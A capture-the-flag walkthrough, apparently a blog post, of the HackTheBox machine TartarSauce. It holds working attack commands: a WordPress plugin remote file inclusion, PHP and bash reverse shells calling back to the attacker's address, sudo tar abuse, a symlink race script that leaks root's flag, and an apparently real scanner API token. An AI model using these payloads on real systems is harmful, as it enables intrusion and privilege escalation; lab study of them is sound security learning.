  • HTB Machine - TartarSauce

    This article is intended solely for technical exchange, learning, and research. Using the techniques described here for illegal or destructive purposes is strictly prohibited; the author bears no responsibility for any resulting consequences.

    The target is a retired machine accessed through the author's VIP subscription; its IP address is 10.10.10.88.

    This walkthrough uses https://github.com/Tib3rius/AutoRecon for an automated, all-round scan.

    Run the command: autorecon 10.10.10.88 -o ./TartarSauce-autorecon

    Only port 80 is open.
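
    If you prefer to scan manually instead of with AutoRecon, a roughly equivalent nmap sketch (flags assumed here, not taken from the original scan output) is:

    # full TCP port sweep, then default scripts and version detection on the open port
    nmap -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.88
    nmap -p 80 -sC -sV -oA nmap/port80 10.10.10.88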

    Nothing much there. The nmap results above listed a few directories; I visited each of them but found nothing exploitable, so I continued with directory brute-forcing on top of that (a quick re-check of those entries is sketched below).
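
    Assuming the directories reported by nmap came from its http-robots.txt script, they can be re-checked directly:

    curl -s http://10.10.10.88/robots.txt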

    gobuster dir -u http://10.10.10.88/webservices/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 400 -x php,jsp,txt -o bmfx-tartarSauce-gobuster

    A wp directory shows up; visit it.

    It is a misconfigured WordPress site; scan it with wpscan.

    wpscan --url http://10.10.10.88/webservices/wp -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc

    My scan here did not detect gwolle, but according to write-ups online this plugin is present and exploitable (a more aggressive scan is sketched below).
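
    Passive enumeration often misses this plugin; forcing wpscan's aggressive plugin detection (a sketch, using the same target URL as above) may surface it:

    # enumerate all plugins aggressively instead of relying on passive fingerprinting
    wpscan --url http://10.10.10.88/webservices/wp -e ap --plugins-detection aggressive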

    searchsploit gwolle
    searchsploit -m 38861
    https://www.exploit-db.com/exploits/38861

    Adapting the exploit above to this target gives the following:

    1. Start a local nc listener on port 8833
    2. curl -s 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5:8833/'
    3. Check what nc receives
    connect to [10.10.14.5] from (UNKNOWN) [10.10.10.88] 38198
    GET /wp-load.php HTTP/1.0
    Host: 10.10.14.5:8833
    Connection: close

    This shows the remote file inclusion test succeeded, and it also tells us that the target will include a file named wp-load.php by default. So on our local Kali box we can create a file with exactly that name containing reverse-shell code.

    Start a local nc listener on port 8833 (nc -lvnp 8833) and serve the malicious wp-load.php over HTTP on port 8000 (see the sketch below), then trigger the inclusion:
    curl -s 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5:8000/'
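
    The original post does not show the payload itself; a minimal sketch, assuming a PHP reverse shell calling back to the nc listener on 8833 and Python's built-in web server on port 8000:

    # wp-load.php on the attacker machine; the target fetches, includes, and executes it
    echo "<?php system('bash -c \"bash -i >& /dev/tcp/10.10.14.5/8833 0>&1\"'); ?>" > wp-load.php

    # serve the payload on port 8000 so the RFI request above can pull it in
    python3 -m http.server 8000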

    While I was at it, I also ran sudo -l and found that tar can be run as the user onuma without a password, so tar can be abused to execute commands and move laterally to onuma (a full command sequence is sketched after the snippet below).

    echo -e '#!/bin/bash
    
    bash -i >& /dev/tcp/10.10.14.5/8866 0>&1' > bmfx.sh
    tar -cvf bmfx.tar bmfx.sh
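
    The archive by itself does not run anything; a commonly used follow-up (the GTFOBins tar checkpoint trick, assumed here because the original post omits the exact command) is to have sudo run tar as onuma with a checkpoint action that executes the reverse-shell script, while nc listens locally on 8866:

    # attacker machine: catch the shell coming back as onuma
    nc -lvnp 8866

    # target, as the current low-privileged user: tar executes bmfx.sh at the first checkpoint, running as onuma
    sudo -u onuma /bin/tar -cvf /dev/null bmfx.sh --checkpoint=1 --checkpoint-action=exec="bash bmfx.sh"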

    Successfully pivoted to user onuma. To prepare for privilege escalation, download pspy32 to the target and monitor running processes (a transfer-and-run sketch follows below).
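
    A minimal transfer-and-run sketch for pspy32, assuming it is served from the attacker box with Python's built-in web server:

    # attacker machine, from the directory containing pspy32
    python3 -m http.server 8000

    # target machine
    cd /tmp
    wget http://10.10.14.5:8000/pspy32
    chmod +x pspy32
    ./pspy32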

    pspy eventually reveals a program that runs as root every 5 minutes on the target; its code is shown below:

    #!/bin/bash
    
    #-------------------------------------------------------------------------------------
    # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
    # ONUMA Dev auto backup program
    # This tool will keep our webapp backed up incase another skiddie defaces us again.
    # We will be able to quickly restore from a backup in seconds ;P
    #-------------------------------------------------------------------------------------
    
    # Set Vars Here
    basedir=/var/www/html
    bkpdir=/var/backups
    tmpdir=/var/tmp
    testmsg=$bkpdir/onuma_backup_test.txt
    errormsg=$bkpdir/onuma_backup_error.txt
    tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
    check=$tmpdir/check
    
    # formatting
    printbdr()
    {
        for n in $(seq 72);
        do /usr/bin/printf $"-";
        done
    }
    bdr=$(printbdr)
    
    # Added a test file to let us see when the last backup was run
    /usr/bin/printf $"$bdr
    Auto backup backuperer backup last ran at : $(/bin/date)
    $bdr
    " > $testmsg
    
    # Cleanup from last time.
    /bin/rm -rf $tmpdir/.* $check
    
    # Backup onuma website dev files.
    /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
    
    # Added delay to wait for backup to complete if large files get added.
    /bin/sleep 30
    
    # Test the backup integrity
    integrity_chk()
    {
        /usr/bin/diff -r $basedir $check$basedir
    }
    
    /bin/mkdir $check
    /bin/tar -zxvf $tmpfile -C $check
    if [[ $(integrity_chk) ]]
    then
        # Report errors so the dev can investigate the issue.
        /usr/bin/printf $"$bdr
    Integrity Check Error in backup last ran :  $(/bin/date)
    $bdr
    $tmpfile
    " >> $errormsg
        integrity_chk >> $errormsg
        exit 2
    else
        # Clean up and save archive to the bkpdir.
        /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
        /bin/rm -rf $check .*
        exit 0
    fi

    From the analysis, the 30-second sleep gives us a window to swap in our own archive: root extracts whatever is in $tmpfile into $check and then runs diff -r against /var/www/html, so if the extracted var/www/html/robots.txt is a symlink to /root/root.txt, the diff (run as root) follows the symlink and the contents of root.txt end up in the error log. For details see: https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html

    #!/bin/bash
    
    # work out of shm
    cd /dev/shm
    
    # set both start and cur equal to any backup file if it's there
    start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
    
    # loop until there's a change in cur
    echo "Waiting for archive filename to change..."
    while [ "$start" == "$cur" -o "$cur" == "" ] ; do
        sleep 10;
        cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
    done
    
    # Grab a copy of the archive
    echo "File changed... copying here"
    cp $cur .
    
    # get filename
    fn=$(echo $cur | cut -d'/' -f4)
    
    # extract archive
    tar -zxf $fn
    
    # remove robots.txt and replace it with link to root.txt
    rm var/www/html/robots.txt
    ln -s /root/root.txt var/www/html/robots.txt
    
    # remove old archive
    rm $fn
    
    # create new archive
    tar czf $fn var
    
    # put it back, and clean up (mv already removes the local copy, no separate rm needed)
    mv $fn $cur
    rm -rf var
    
    # wait for results
    echo "Waiting for new logs..."
    tail -f /var/backups/onuma_backup_error.txt

    Successfully obtained root.txt.

  • Original post: https://www.cnblogs.com/autopwn/p/14108178.html